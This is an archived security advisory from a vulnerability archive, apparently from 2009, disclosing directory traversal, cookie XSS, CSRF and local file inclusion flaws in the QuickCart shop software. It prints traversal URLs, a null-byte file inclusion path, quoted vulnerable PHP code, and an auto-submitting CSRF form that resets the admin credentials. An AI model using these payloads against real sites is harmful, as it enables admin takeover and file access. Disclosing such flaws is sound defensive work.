what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

QuickCart XSS / XSRF / LFI

QuickCart XSS / XSRF / LFI
Posted Oct 9, 2009
Authored by kl3ryk

QuickCart suffers from cross site scripting, cross site request forgery, and local file inclusion vulnerabilities.

tags | exploit, local, vulnerability, xss, file inclusion, csrf
SHA-256 | 931a91b835fb5cf26189c93ec147cebe81a758e4c66ec6a3aa0c49fc43afd864

QuickCart XSS / XSRF / LFI

Change Mirror Download
DISCOVERED: Paweł 'kl3ryk' Łaskarzewski
GREETZ: hawk, pin3ska, black ant_, qwert666, ua and gacmaan

DIRECTORY TRAVERSAL
http://victim.com/?p=[ONE OF THE EXISITING FILES]-[EXISITING ACTION IN
THIS FILE]-
Most of actions load templates form bad directory and then throw an exception.

example:
http://victim.com/?p=../actions_admin/settings-config
#########################
COOKIE XSS
1) in login form in admin.php
You need to change cookie "sLogin" and there put your XSS code. After
that when you will go to http://revival.pl/test/quickcart/admin.php
you will see your XSS executed.

####templates/admin/loign.tpl
<form method="post" action="$sLoginPage" name="form">
<fieldset>
<input type="hidden" name="sLoginPageNext" value="$_SERVER[REQUEST_URI]" />
<div id="login"><label>$lang['Login']:</label><input type="text"
name="sLogin" class="input" value="$_COOKIE[sLogin]" /></div> //XSS
<div id="pass"><label>$lang['Password']:</label><input
type="password" name="sPass" class="input" value="" /></div>
<div id="submit"><input type="submit" value="$lang['log_in']
&raquo;" /></div>
</fieldset>
</form>

#########################
XSRF for any admin action

POC will change admin login and password in configuration file
<form id="myForm"
action="http://192.168.1.107/quickcart/admin.php?p=settings-config"
method="post">
<input type="text" name="sOption" value="save"/>
<input type="text" name="login" value="admin2"/>
<input type="text" name="pass" value="admin2"/>
</form>
<script>
document.getElementById("myForm").submit();
</script>

#########################
LFI
In quick.cart there are two ways to pass parameters to the script:
index.php?param1,param2,param3
or
index.php?p=param1-param2-param3

In first case our LFI is in param3 in second filename is in param1.
Unfourtuenetly both methods have contrains.
First change all special chars (including dots into their safe
equivalents) and change require that file must be inside
actions_client directory.
Secend one require from filename php extension

example:
http://victim.com/nothing,important,our.file.name.html%00
http://victim.com/?p=../path.to.our.php.file-nothing-important

EXPLANATION:
####index.php:
[CODE]
extract( $_GET );
[...]
$aActions = isset( $p ) ? getAction( $p ) : getUrlFromGet( );
[...]
if( isset( $aActions ) && is_file( 'actions_client/'.$aActions['f'].'.php' ) )
require 'actions_client/'.$aActions['f'].'.php';
[/CODE]

getUrlFromGet is function to handle first method and getAction to
handle second one.


####libraries/Trash.php
[CODE]
function getAction( $p ){
global $a;
if( ereg( '-', $p ) ){
$aExp = explode( '-', $p );
$iCount = count( $aExp );
for( $i = 0; $i < $iCount; $i++ ){
if( !empty( $aExp[$i] ) ){
if( $i == 0 )
$aActions['f'] = $aExp[$i];
elseif( $i == 1 )
$aActions['a'] = $aExp[$i];
else{
$aActions['o'.( $i - 1 )] = $aExp[$i];
}
}
} // end for
if( !empty( $aActions['f'] ) && !empty( $aActions['a'] ) ){
$a = $aActions['a'];
$aActions['sLink'] = '?p='.$p;
return $aActions;
}
}
}
[/CODE]

As we can see in our param string ereg search minus and because our
filename is on first position we can't use null byte (%00) to pass
filename without php extension.


####core/common.php
[CODE]
function getUrlFromGet( ){
global $a;
if( isset( $_GET ) && is_array( $_GET ) ){
foreach( $_GET as $mKey => $mValue ){
if( strstr( $mKey, ',' ) ){
$mKey = htmlspecialchars( $mKey );
[/CODE]

htmlspecialchars destroy our dreams about full LFI bug.
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close